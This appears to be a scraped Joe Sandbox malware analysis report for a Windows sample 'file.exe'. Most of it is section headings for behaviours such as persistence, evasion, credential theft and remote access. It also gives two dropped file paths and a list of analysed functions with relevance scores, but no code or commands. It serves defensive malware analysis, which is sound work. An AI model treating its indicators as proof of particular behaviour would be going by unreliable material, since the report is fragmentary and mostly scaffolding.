Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\ZBldshzBAkDNcchezeGR.dll

C:\Users\user\AppData\Local\Temp\service123.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Windows Analysis Report
file.exe

Function 6C2F14B0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 121
COMMON

Function 00C1116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Function 00C115B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Function 6C309C22 Relevance: 15.1, APIs: 10, Instructions: 110
sleepclipboardCOMMON

Function 00C181E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 116
libraryloaderCOMMON

Function 00C18230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 62
libraryloaderCOMMON

Function 00C113C9 Relevance: 12.1, APIs: 8, Instructions: 109
stringCOMMON

Function 00C111A3 Relevance: 10.6, APIs: 7, Instructions: 115
sleepstringCOMMON

Function 00C11160 Relevance: 9.1, APIs: 6, Instructions: 131
sleepstringCOMMON

Function 6C309B70 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
sleepsynchronizationclipboardCOMMON

Function 00C11296 Relevance: 5.1, APIs: 4, Instructions: 80
stringCOMMON

Function 00C113BB Relevance: 5.1, APIs: 4, Instructions: 66
stringCOMMON

Function 6C30B3F0 Relevance: 1.4, APIs: 1, Instructions: 144
COMMON

Function 6C30B560 Relevance: 1.3, APIs: 1, Instructions: 95
COMMON